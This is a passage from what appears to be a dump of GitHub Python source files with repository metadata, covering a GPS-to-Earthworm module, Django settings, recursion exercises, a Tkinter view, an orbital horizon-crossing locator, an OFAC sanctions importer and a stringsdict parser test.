('positionlog_xyz', 'a')\n #print \"X = %12.3f Y = %12.3f Z = %12.3f\" % (GPSRecv.rec_dict['X_POS'], GPSRecv.rec_dict['Y_POS'], GPSRecv.rec_dict['Z_POS'])\n \n ## Format time\n gpsweek=(self.GPSRecv.rec_dict['GPS_WEEK'])\n tiempo=(self.GPSRecv.rec_dict['GPS_TIME'])/1000\n gpstime=gpsweek*secsInWeek + tiempo + GPS_LEAP_SECONDS\n unxtime=int(gpstime) + UNIX2GPS - GPS_LEAP_SECONDS\n fecha=(time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.gmtime(unxtime)))\n #print \"%i %i %i %i \" % (gpsweek, tiempo, gpstime, unxtime)\n #print \"%i LAT = %12.8f LON = %12.8f HT = %12.8f\" % (unxtime, GPSRecv.rec_dict['LATITUDE'], GPSRecv.rec_dict['LONGITUDE'], GPSRecv.rec_dict['HEIGHT'])\n \n # Close pos file\n #outfile.write ( \"%s %12.8f %12.8f %12.8f\\n\" % (fecha, GPSRecv.rec_dict['X_POS']-STA_X, GPSRecv.rec_dict['Y_POS']-STA_Y, GPSRecv.rec_dict['Z_POS']-STA_Z))\n #outfile.close()\n \n # Create EW Wave to send\n xdat = (self.GPSRecv.rec_dict['X_POS']-STA_X)*1000\n X = {\n 'station': self.Station,\n 'network': self.Network,\n 'channel': 'GPX',\n 'location': '--',\n 'nsamp': 1,\n 'samprate': 1,\n 'startt': unxtime,\n #'endt': unixtime+1,\n 'datatype': 'i4',\n 'data': np.array([xdat], dtype=self.dt)\n }\n \n ydat = (self.GPSRecv.rec_dict['Y_POS']-STA_Y)*1000\n Y = {\n 'station': self.Station,\n 'network': self.Network,\n 'channel': 'GPY',\n 'location': '--',\n 'nsamp': 1,\n 'samprate': 1,\n 'startt': unxtime,\n #'endt': unxtime + 1,\n 'datatype': 'i4',\n 'data': np.array([ydat], dtype=self.dt)\n }\n \n zdat = (self.GPSRecv.rec_dict['Z_POS']-STA_Z)*1000\n Z = {\n 'station': self.Station,\n 'network': self.Network,\n 'channel': 'GPZ',\n 'location': '--',\n 'nsamp': 1,\n 'samprate': 1,\n 'startt': unxtime,\n #'endt': unxtime + 1,\n 'datatype': 'i4',\n 'data': np.array([zdat], dtype=self.dt)\n }\n \n # Send to EW\n self.gsof2ring.put_wave(0, X)\n self.gsof2ring.put_wave(0, Y)\n self.gsof2ring.put_wave(0, Z)\n \n def run(self):\n \n # The main loop\n while self.runs:\n if self.gsof2ring.mod_sta() is False:\n break\n time.sleep(0.001)\n self.getGps()\n self.gsof2ring.goodbye()\n quit()\n print (\"Exiting\")\n \n def start(self):\n self.myThread.start()\n \n def stop(self):\n self.runs = False\n","repo_name":"Boritech-Solutions/PyEarthworm","sub_path":"examples/Gsof2Ring/EWMod.py","file_name":"EWMod.py","file_ext":"py","file_size_in_byte":12533,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"29352998834","text":"\"\"\"\nDjango settings for helfeedback project.\n\"\"\"\n\nimport os\nimport environ\nimport raven\n\nroot = environ.Path(__file__) - 2 # two steps up, gets parent of this file\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nenv = environ.Env(\n # Currently added as prefix to session and csrf-cookies\n INSTANCE_NAME=(str, 'helfeedback'),\n # Currently defines *_COOKIE_PATH, do not include leading /\n URL_PREFIX=(str, None),\n # DEBUG creates non-obvious vulnerabilities, keep disabled in production\n DEBUG=(bool, False),\n TRUST_PROXY_SSL=(bool, False),\n TRUST_PROXY_HOST=(bool, False),\n ALLOWED_HOSTS=(list, []),\n ADMINS=(list, []),\n DATABASE_URL=(str, 'postgres:///helfeedback'),\n REDIS_URL=(str, 'redis://localhost:6379/0'),\n MEDIA_ROOT=(environ.Path(), root('media')),\n STATIC_ROOT=(environ.Path(), root('static')),\n MEDIA_URL=(str, '/media/'),\n STATIC_URL=(str, '/static/'),\n SENTRY_DSN=(str, ''),\n SECRET_KEY=(str, ''),\n)\n# read in environment from from \"config_dev.env\"\n# config_dev tries to suggest that the file should only be used\n# in development. Envvars should be used in production to avoid\n# accidents with leftover files\nenviron.Env.read_env('config_dev.env')\n\n\n# Config translation from environment (can be from file)\n\nDEBUG = env('DEBUG')\nALLOWED_HOSTS = env('ALLOWED_HOSTS')\nADMINS = env('ADMINS')\nDATABASES = {\n 'default': env.db(),\n}\n# Celery, first line kept here for closeness\nCELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'\nBROKER_URL = env('REDIS_URL')\nSTATIC_URL = env('STATIC_URL')\nMEDIA_URL = env('MEDIA_URL')\nSTATIC_ROOT = env('STATIC_ROOT')\nMEDIA_ROOT = env('MEDIA_ROOT')\nCSRF_COOKIE_NAME = '{}-csrftoken'.format(env('INSTANCE_NAME'))\nSESSION_COOKIE_NAME = '{}-sessionid'.format(env('INSTANCE_NAME'))\nSESSION_COOKIE_PATH = '/{}'.format(env('URL_PREFIX'))\nif not DEBUG:\n SESSION_COOKIE_SECURE = True\n CSRF_COOKIE_SECURE = True\n# Perhaps combine these two into TRUST_PROXY?\nif env('TRUST_PROXY_SSL'):\n SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nif env('TRUST_PROXY_HOST'):\n USE_X_FORWARDED_HOST = True\n# INSTALLED_APPS is manipulated below, after defining it\nif env('SENTRY_DSN'):\n RAVEN_CONFIG = {\n 'dsn': env('SENTRY_DSN'),\n 'release': raven.fetch_git_sha(BASE_DIR),\n }\n\n# Django default logging without debug does not output anything\n# to std*, let use log errors and worse. They should end up\n# in the runtime (ie. uwsgi, gunicorn...) logs\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'ERROR',\n },\n },\n}\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'djcelery',\n 'compressor',\n\n # Apps within this repository\n 'feedback'\n]\n\n# Rest of configuration is above together with others\nif env('SENTRY_DSN'):\n INSTALLED_APPS.append('raven.contrib.django.raven_compat')\n\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n]\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"node_modules/\"),\n]\n\nCOMPRESS_PRECOMPILERS = [\n ('text/x-scss', 'django_libsass.SassCompiler'),\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'helfeedback.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'helfeedback.wsgi.application'\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'fi'\n\nTIME_ZONE = 'Europe/Helsinki'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# local_settings.py can be used to override environment-specific settings\n# like database and email that differ between development and production.\nlocal_settings_path = os.path.join(BASE_DIR, \"local_settings.py\")\nif os.path.exists(local_settings_path):\n with open(local_settings_path) as fp:\n code = compile(fp.read(), local_settings_path, 'exec')\n exec(code, globals(), locals())\n\n\n# If a secret key was not supplied from elsewhere, generate a random one\n# and store it into a file called .django_secret.\nif 'SECRET_KEY' not in locals():\n secret_file = os.path.join(BASE_DIR, '.django_secret')\n try:\n SECRET_KEY = open(secret_file).read().strip()\n except IOError:\n import random\n system_random = random.SystemRandom()\n try:\n SECRET_KEY = ''.join([system_random.choice('abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)') for i in range(64)])\n secret = open(secret_file, 'w')\n os.chmod(secret_file, 0o0600)\n secret.write(SECRET_KEY)\n secret.close()\n except IOError:\n Exception('Please create a %s file with random characters to generate your secret key!' % secret_file)\n","repo_name":"City-of-Helsinki/helfeedback","sub_path":"helfeedback/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20801876111","text":"\ndef max_list_iter(int_list): # must use iteration not recursion\n \"\"\"finds the max of a list of numbers and returns the value (not the index)\n If int_list is empty, returns None. If list is None, raises ValueError\"\"\"\n maxVal = -9999999999999999999999999 \n if int_list == None :\n raise ValueError\n elif (len(int_list) == 0):\n return None\n else:\n for i in range( len(int_list)):\n if int_list[i] > maxVal:\n maxVal = int_list[i]\n return maxVal\n\ndef reverse_rec(int_list): # must use recursion\n \"\"\"recursively reverses a list of numbers and returns the reversed list\n If list is None, raises ValueError\"\"\"\n if int_list == None:\n raise ValueError\n if len(int_list) == 0:\n return []\n return [int_list[-1]] + reverse_rec(int_list[:-1])\n\ndef bin_search(target, low, high, int_list): # must use recursion\n \"\"\"searches for target in int_list[low..high] and returns index if found\n If target is not found returns None. If list is None, raises ValueError \"\"\"\n\n middleIdx = low + (high - low) //2\n if( low> high ):\n return None\n if( int_list == None or int_list[middleIdx] == None ):\n raise ValueError \n\n if int_list[middleIdx] == target:\n return middleIdx\n elif target < int_list[middleIdx]: \n return bin_search(target, low , middleIdx -1, int_list)\n elif target > int_list[middleIdx] : \n return bin_search( target, middleIdx+1 , high, int_list)\n \nlist_val =[0,1,2,3,4,7,9,10 ]\nprint(bin_search(1, 0 , len(list_val)-1, list_val))\nprint(bin_search(1000, 0 , len( list_val)-1, list_val))\n\n# 0 1 2 3 4 5 6 7 9 10\n#","repo_name":"cpe202spring2019/lab1-c0caDJ","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"123994147","text":"from tkinter import *\r\nfrom MindMedia.DBoperations import fetch_friends, delete_friends\r\nfrom MindMedia.session_handler import current_user\r\nfrom tkinter import font\r\n\r\n\r\nclass ViewFriends(Frame):\r\n def __init__(self, parent, current_user):\r\n super(ViewFriends, self).__init__(parent)\r\n self.current_user = current_user\r\n self.set_up_view_friends()\r\n\r\n def set_up_view_friends(self):\r\n self.lis = fetch_friends(self.current_user)\r\n # self.friend_names = [fetch_user_name(x[0])[0] for x in self.lis]\r\n # print(self.friend_names)\r\n Label(self, text=\"Your friends\", font=font.Font(size=20)).pack()\r\n self.frames = []\r\n F=Frame(self)\r\n F.pack()\r\n f2 = Frame(F)\r\n f2.pack(side=LEFT)\r\n f3 = Frame(F)\r\n f3.pack(side=LEFT)\r\n self.frames.append(F)\r\n for x in range(len(self.lis)):\r\n Label(f2,text=self.lis[x],font=font.Font(size=14)).pack(fill=X,padx=10,pady=10)\r\n Button(f3, text=\"unfriend\", font=font.Font(size=12), bg='lightblue',\r\n command=self.delete_friend_button_clicked(self.lis[x])).pack(fill=X,padx=10,pady=10)\r\n\r\n def delete_friend_button_clicked(self, name):\r\n def action_function():\r\n delete_friends(self.current_user, name[0])\r\n self.pack_forget()\r\n return action_function\r\n\r\n\r\n# root = Tk()\r\n# w = ViewFriends(root,current_user())\r\n# w.pack()\r\n# root.mainloop()\r\n","repo_name":"vasanthrv10/MindMedia","sub_path":"friends_view.py","file_name":"friends_view.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8343326718","text":"import os\nimport csv\nfrom typing import Text\nimport numpy as np\nimport pandas as pd\n\ndef check_trade_book():\n\n TRADE_BOOK = []\n\n if os.path.exists('dataFiles/TRADE_BOOK.csv'):\n\n with open('dataFiles/TRADE_BOOK.csv', 'r') as f:\n data = csv.reader(f)\n\n for line in data:\n array = np.array(line)\n TRADE_BOOK.append(array.astype(np.float64))\n\n return TRADE_BOOK \n\n else:\n return TRADE_BOOK\n\n\ndef update_trade_data(TRADE_BOOK):\n with open('dataFiles/TRADES_BOOK.csv', 'w', newline='') as f:\n data_writer = csv.writer(f, delimiter=',',quoting=csv.QUOTE_MINIMAL)\n\n for line in TRADE_BOOK:\n\n data_writer.writerow(line)\n\n\n\nTRADE = check_trade_book()\n\ndel TRADE[0]\n\nupdate_trade_data(TRADE)\n","repo_name":"notsofatrabbit/BiananceHiLoBot","sub_path":"CHECK_TRADE_DATA.py","file_name":"CHECK_TRADE_DATA.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71782553125","text":"# Author: Nathaniel Ruhl\n# This script contains a class that locates r0_hc for an arbitrary orbital model\n# For the algorithm to work, we must a-priori know hc_type\n\nimport numpy as np\n\nimport Modules.tools as tools\nimport Modules.constants as constants\n\n\n# This class locates r0 for both the rising and setting crossing\nclass LocateR0hc:\n n_step_size = 0.1 # km step size along the line-of-sight (LOS)\n max_los_dist = 3000 # km, max distance that we look for graze point along the LOS\n\n def __init__(self, obs_dict, r_array, v_array, t_array):\n # Unpack inputs\n self.obs_dict = obs_dict\n self.hc_type = obs_dict[\"hc_type\"]\n self.starECI = obs_dict[\"starECI\"]\n self.crossing_time_range = obs_dict[\"crossing_time_range\"]\n if obs_dict[\"detector\"] == \"NICER\":\n self.year0 = 2014\n elif obs_dict[\"detector\"] == \"RXTE\":\n self.year0 = 1994\n self.r_array = r_array\n self.v_array = v_array\n self.t_array = t_array\n\n # derived inputs\n self.R_orbit, self.h_unit = self.define_R_orbit_h_unit()\n self.psi = np.rad2deg(\n (np.pi/2)-np.arccos(np.dot(self.h_unit, self.starECI))) # out-of plane angle (deg)\n\n # Sequential steps of the algorithm\n self.A_2d, self.r0_2d = self.get_initial_guess()\n self.t0_guess_list, self.r0_guess_list = self.get_t0_guess_indices()\n self.r0_hc, self.t0_model_index, self.graze_point, self.A_3d = self.locate_r0_numerical()\n\n # Other useful variables\n self.g_unit = self.graze_point / np.linalg.norm(self.graze_point)\n self.t0_model = t_array[self.t0_model_index]\n self.lat_gp, self.lon_gp, alt_gp = tools.eci2geodetic_pymap_vector(self.graze_point, self.t0_model, self.year0)\n print(f\"TransmitModel: alt_gp={alt_gp} km\")\n\n def get_initial_guess(self):\n starECI_proj = tools.proj_on_orbit(self.starECI, self.h_unit)\n # Use the 2d formulas to guess where r0 may be\n if self.hc_type == \"rising\":\n g_unit_proj = np.cross(starECI_proj, self.h_unit)\n elif self.hc_type == \"setting\":\n g_unit_proj = np.cross(self.h_unit, starECI_proj)\n\n A_2d = np.sqrt(self.R_orbit ** 2 - constants.R_EARTH ** 2)\n r0_2d = constants.R_EARTH * g_unit_proj - A_2d * starECI_proj\n return A_2d, r0_2d\n\n def get_t0_guess_indices(self):\n if self.obs_dict['detector'] == \"RXTE\":\n print(f\"psi = {self.psi}\")\n if abs(self.psi) < 5:\n search_factor = 0.005\n elif abs(self.psi) < 10:\n search_factor = 0.001\n elif abs(self.psi) < 20:\n search_factor = 0.05\n elif abs(self.psi) < 30:\n search_factor = 0.1\n else:\n search_factor = 0.1\n print(\"Out-of plane angle greater than 30 deg. search_factor = 0.1\")\n else:\n # NICER doesn't get very far out-of-plane\n search_factor = 0.005\n # TODO: Improve this algorithm... make a sort of gradient descent to find the tangent point\n r0_guess_indices = np.isclose(self.r_array, self.r0_2d, search_factor)\n\n # 0.5% corresponds to ~15km or more for each component (0.005*3000=15)\n\n t0_guess_list = [] # INDICES in r_array\n\n for index, value in enumerate(r0_guess_indices):\n if all(value) == True:\n t0_guess_list.append(index)\n # get the positions that corresponds to the t0 list\n # t0 indices are for r_array\n r0_guess_list = self.r_array[min(t0_guess_list):max(t0_guess_list)+1]\n\n return t0_guess_list, r0_guess_list\n\n # Line of sight from the predicted satellite position r(t)\n def los_line(self, time_index, n_list):\n if isinstance(n_list, int) or isinstance(n_list, float):\n # n_list is not a list, but a single number\n n = n_list\n return self.r0_guess_list[time_index] + n * self.starECI\n else:\n n_column_vec = n_list.reshape((len(n_list), 1))\n starArray = np.ones((len(n_list), 3)) * self.starECI\n return self.r0_guess_list[time_index] + n_column_vec * starArray\n\n # Locate r0 via aligning the LOS to be tangent to earth\n def locate_r0_numerical(self):\n # Loop through different times, different lines of sight during the crossing\n # print(constants.R_EARTH)\n for time_index, t0_model_index in enumerate(self.t0_guess_list):\n # Lists to check radial altitude at different points along the LOS\n n_list = np.arange(0, LocateR0hc.max_los_dist, LocateR0hc.n_step_size)\n los_points = self.los_line(time_index, n_list) # all points along the LOS\n\n # Lists to check radial altitude at different points along the LOS\n # Pymap3d (tools.py) seems to be buggy right now, so we'll ignore longitude and do it manually\n los_mag_list = np.sqrt(los_points[:, 0] ** 2 + los_points[:, 1] ** 2 + los_points[:, 2] ** 2)\n polar_angles = np.arccos(los_points[:, 2] / los_mag_list) # polar angle at every point along the line of sight\n # Find the radius of earth with the same polar angle as points along the line of sight\n earth_points = tools.point_on_earth_azimuth_polar(np.zeros_like(polar_angles), polar_angles)\n earth_radius_list = np.sqrt(earth_points[:, 0] ** 2 + earth_points[:, 1] ** 2 + earth_points[:, 2] ** 2)\n\n # Identify hc_type (note that this needs to be defined earlier)\n # if time_index == 0:\n # middle_index_los = np.argmin(los_mag_list)\n #\n # if los_mag_list[middle_index_los] < earth_radius_list[middle_index_los]:\n # hc_type = \"rising\"\n # elif los_mag_list[middle_index_los] > earth_radius_list[middle_index_los]:\n # hc_type = \"setting\"\n\n # Check if we reached the tangent grazing point\n # print(np.min(los_mag_list)-np.min(earth_radius_list))\n if self.hc_type == \"rising\":\n if all(los_mag_list >= earth_radius_list):\n # Find the point of closest approach, the tangent point\n n_graze_index = np.argmin(los_mag_list)\n A_3d = n_list[n_graze_index]\n # The 2 below definitions are insightful, but not currently being used\n graze_point = los_points[n_graze_index]\n graze_phi = polar_angles[n_graze_index] # polar angle at graze_point\n return self.r0_guess_list[time_index], t0_model_index, graze_point, A_3d\n else:\n continue\n # keep moving through time until the whole LOS is above earth\n elif self.hc_type == \"setting\":\n if any(los_mag_list <= earth_radius_list):\n # Find the point of closest approach, the tangent point\n n_graze_index = np.argmin(los_mag_list)\n A_3d = n_list[n_graze_index]\n # The 2 below definitions are insightful, but not currently being used\n graze_point = los_points[n_graze_index]\n graze_phi = polar_angles[n_graze_index] # polar angle at graze_point\n return self.r0_guess_list[time_index], t0_model_index, graze_point, A_3d\n else:\n # keep moving through time until the whole LOS is above earth\n continue\n\n print('Tangent point not located in specified time range')\n return 0, 0, 0, 0\n\n # Used in HCNM Driver\n def return_r0_data(self):\n return self.t0_model_index, self.lat_gp, self.lon_gp\n\n # Function used to define R_orbit and h_unit at the middle of the crossing time period\n def define_R_orbit_h_unit(self):\n mid_time = (self.crossing_time_range[0]+self.crossing_time_range[1])/2\n mid_time_index = np.where(self.t_array >= mid_time)[0][0]\n R_orbit = np.linalg.norm(self.r_array[mid_time_index])\n h_unit = np.cross(self.r_array[mid_time_index], self.v_array[mid_time_index])\n h_unit = h_unit / np.linalg.norm(h_unit)\n return R_orbit, h_unit\n","repo_name":"nruhl25/HorizonCrossings-project","sub_path":"HCNM2/Old_Code/LocateR0hc.py","file_name":"LocateR0hc.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73640574886","text":"import logging\nimport re\nfrom datetime import date\nfrom time import strptime\nfrom typing import Dict, Any, Tuple, Optional\nfrom django.core.exceptions import ValidationError\nfrom django.db import transaction\nfrom django.utils import translation\nfrom django.utils.timezone import now\nfrom django.utils.translation import gettext as _\nfrom jutil.admin import admin_log\nfrom jutil.format import choices_label\nfrom jutil.xml import xml_to_dict\nfrom jsanctions.models import (\n SanctionsListFile,\n SanctionEntity,\n NameAlias,\n SubjectType,\n BirthDate,\n Address,\n Identification,\n Remark,\n)\n\nlogger = logging.getLogger(__name__)\n\nOFAC_LIST_TYPE = \"OFAC\"\n\nOFAC_XML_ARRAY_TAGS = [\"sdnEntry\", \"program\", \"aka\", \"dateOfBirthItem\", \"placeOfBirthItem\", \"address\", \"id\"]\n\n\ndef load_ofac_sanction_list_as_dict(filename: str) -> Dict[str, Any]:\n with open(filename, \"rb\") as fp:\n data: Dict[str, Any] = xml_to_dict(fp.read(), array_tags=OFAC_XML_ARRAY_TAGS)\n return data\n\n\ndef parse_ofac_date(v: str) -> date:\n st = strptime(v, \"%m/%d/%Y\")\n if not st:\n raise ValidationError(_(\"Invalid date value {}\").format(v))\n return date(st.tm_year, st.tm_mon, st.tm_mday)\n\n\ndef parse_ofac_dob(v: str) -> Tuple[Optional[int], Optional[int], Optional[int]]:\n if re.fullmatch(r\"\\d{4}\", v):\n return int(v), None, None\n if re.fullmatch(r\"\\d{1,2}/\\d{1,2}/\\d{4}\", v):\n st = strptime(v, \"%m/%d/%Y\")\n return st.tm_year, st.tm_mon, st.tm_mday\n if re.fullmatch(r\"\\d{1,2} \\w{3} \\d{4}\", v):\n with translation.override(\"en_US\"):\n st = strptime(v, \"%d %b %Y\")\n return st.tm_year, st.tm_mon, st.tm_mday\n return None, None, None\n\n\ndef get_opt_ofac_str(data: Dict[str, Any], key: str) -> str:\n return data.get(key, \"\") or \"\"\n\n\ndef get_ofac_subject_type(data: Dict[str, Any]) -> SubjectType:\n sdn_type = data[\"sdnType\"]\n if sdn_type == \"Entity\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.ENTERPRISE)\n elif sdn_type == \"Individual\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.PERSON)\n elif sdn_type == \"Vessel\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.VESSEL)\n elif sdn_type == \"Aircraft\":\n obj, created = SubjectType.objects.get_or_create(classification_code=SubjectType.AIRCRAFT)\n else:\n logger.warning(\"Unknown sdnType: %s\", sdn_type)\n obj, created = SubjectType.objects.get_or_create(classification_code=sdn_type, code=sdn_type)\n assert isinstance(obj, SubjectType)\n if created:\n obj.code = choices_label(SubjectType.CLASSIFICATION_CODES, obj.classification_code)\n obj.save(update_fields=[\"code\"])\n return obj\n\n\ndef parse_ofac_uid(data: Dict[str, Any]) -> int:\n uid = data.get(\"uid\")\n if uid is None:\n raise ValidationError(_(\"UID missing\"))\n return int(uid)\n\n\ndef create_ofac_alias(se: SanctionEntity, **kwargs) -> NameAlias:\n first_name = kwargs.get(\"firstName\") or \"\"\n last_name = kwargs.get(\"lastName\") or \"\"\n uid = parse_ofac_uid(kwargs)\n whole_name = (first_name + \" \" + last_name).strip()\n alias = NameAlias(sanction=se, first_name=first_name, last_name=last_name, whole_name=whole_name, logical_id=uid)\n alias.full_clean()\n alias.save()\n return alias\n\n\ndef create_ofac_dob(se: SanctionEntity, **kwargs) -> BirthDate:\n dob = BirthDate(sanction=se)\n dob.logical_id = parse_ofac_uid(kwargs)\n dob.birth_date_description = kwargs.get(\"dateOfBirth\") or \"\"\n year, month_of_year, day_of_month = parse_ofac_dob(dob.birth_date_description)\n dob.year = year # type: ignore\n dob.month_of_year = month_of_year # type: ignore\n dob.day_of_month = day_of_month # type: ignore\n if year and month_of_year and day_of_month:\n dob.birth_date = date(year, month_of_year, day_of_month)\n dob.full_clean()\n dob.save()\n return dob\n\n\ndef create_ofac_place_of_birth(se: SanctionEntity, **kwargs) -> BirthDate:\n dob = BirthDate.objects.all().filter(sanction=se, place=\"\").order_by(\"id\").first()\n if dob is None:\n dob = BirthDate(sanction=se, logical_id=parse_ofac_uid(kwargs))\n dob.place = get_opt_ofac_str(kwargs, \"placeOfBirth\")\n dob.full_clean()\n dob.save()\n return dob\n\n\ndef create_ofac_address(se: SanctionEntity, **kwargs) -> Address:\n address = Address(sanction=se)\n address.logical_id = parse_ofac_uid(kwargs)\n address.region = get_opt_ofac_str(kwargs, \"stateOrProvince\")\n address.city = get_opt_ofac_str(kwargs, \"city\")\n address.zip_code = get_opt_ofac_str(kwargs, \"postalCode\")\n address.country_description = get_opt_ofac_str(kwargs, \"country\")\n street = \"\"\n for n in range(1, 5):\n k = \"address{}\".format(n)\n if k in kwargs:\n street = street + \"\\n\" + str(kwargs.get(k))\n else:\n break\n address.street = street.strip()\n address.full_clean()\n address.save()\n return address\n\n\ndef create_ofac_id(se: SanctionEntity, **kwargs) -> Identification:\n id_obj = Identification(sanction=se)\n id_obj.logical_id = parse_ofac_uid(kwargs)\n id_obj.number = kwargs.get(\"idNumber\") or \"\"\n id_obj.identification_type_description = kwargs.get(\"idType\") or \"\"\n id_obj.country_description = kwargs.get(\"idCountry\") or \"\"\n id_obj.full_clean()\n id_obj.save()\n return id_obj\n\n\ndef set_ofac_members( # noqa\n se: SanctionEntity,\n data: Dict[str, Any],\n verbose: bool = False,\n padding: int = 0,\n):\n # uid\n se.logical_id = parse_ofac_uid(data)\n\n # firstName, lastName\n first_name, last_name = get_opt_ofac_str(data, \"firstName\"), get_opt_ofac_str(data, \"lastName\")\n if first_name or last_name:\n create_ofac_alias(se, **data)\n\n # sdnType\n se.subject_type = get_ofac_subject_type(data)\n\n # remarks\n remarks = data.get(\"remarks\") or \"\"\n if remarks:\n remark_obj = Remark(container=se, text=remarks)\n remark_obj.full_clean()\n remark_obj.save()\n\n # programList\n for program in data.get(\"programList\", {}).get(\"program\", []) or []:\n if program:\n remark_obj = Remark(container=se, text=\"program={}\".format(program))\n remark_obj.full_clean()\n remark_obj.save()\n\n # akaList\n for e_data in data.get(\"akaList\", {}).get(\"aka\", []) or []:\n create_ofac_alias(se, **e_data)\n\n # dateOfBirthList\n for e_data in data.get(\"dateOfBirthList\", {}).get(\"dateOfBirthItem\", []) or []:\n create_ofac_dob(se, **e_data)\n\n # placeOfBirthList\n for e_data in data.get(\"placeOfBirthList\", {}).get(\"placeOfBirthItem\", []) or []:\n create_ofac_place_of_birth(se, **e_data)\n\n # addressList\n for e_data in data.get(\"addressList\", {}).get(\"address\", []) or []:\n create_ofac_address(se, **e_data)\n\n # idList\n for e_data in data.get(\"idList\", {}).get(\"id\", []) or []:\n create_ofac_id(se, **e_data)\n\n se.full_clean()\n se.save()\n if verbose:\n logger.info(\"%sSaved %s\", padding * \" \", se)\n\n\ndef import_ofac_sanctions(source: SanctionsListFile, verbose: bool = False):\n data = load_ofac_sanction_list_as_dict(source.full_path)\n source.generation_date = parse_ofac_date(data[\"publshInformation\"][\"Publish_Date\"])\n\n t0 = now()\n entities_list = data.get(\"sdnEntry\", [])\n for se_data in entities_list:\n assert isinstance(se_data, dict)\n if verbose:\n logger.info(\" sdnEntry uid %s\", se_data.get(\"uid\"))\n with transaction.atomic():\n se = SanctionEntity.objects.create(source=source, data=se_data)\n set_ofac_members(se, se_data, verbose=verbose, padding=4)\n\n source.imported = now()\n source.save()\n msg = \"Imported {} sanction entities from {} in {}\".format(len(entities_list), source.full_path, source.imported - t0)\n logger.info(msg)\n admin_log([source], msg)\n","repo_name":"kajala/django-jsanctions","sub_path":"jsanctions/ofac.py","file_name":"ofac.py","file_ext":"py","file_size_in_byte":7943,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"33641106320","text":"import cStringIO\nimport mock\nimport os\nimport types\nimport unittest\n\nfrom burton import parser\nimport teststringio\n\nclass StringsDictTests(unittest.TestCase):\n sample_strings = \\\n\"\"\"\n\n\n \n Activate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n NSStringFormatSpecTypeKey\n NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Activate %lu Fonts\n one\n Activate %lu Font\n two\n Activate %lu Fonts\n few\n Activate %lu Fonts\n many\n Activate %lu Fonts\n other\n Activate %lu Fonts\n \n \n Deactivate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n NSStringFormatSpecTypeKey\n NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Deactivate %lu Fonts\n one\n Deactivate %lu Font\n two\n Deactivate %lu Fonts\n few\n Deactivate %lu Fonts\n many\n Deactivate %lu Fonts\n other\n Deactivate %lu Fonts\n \n \n \n\n\"\"\"\n\n translated_strings = \\\n\"\"\"\n\n\n \n Activate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n NSStringFormatSpecTypeKey\n 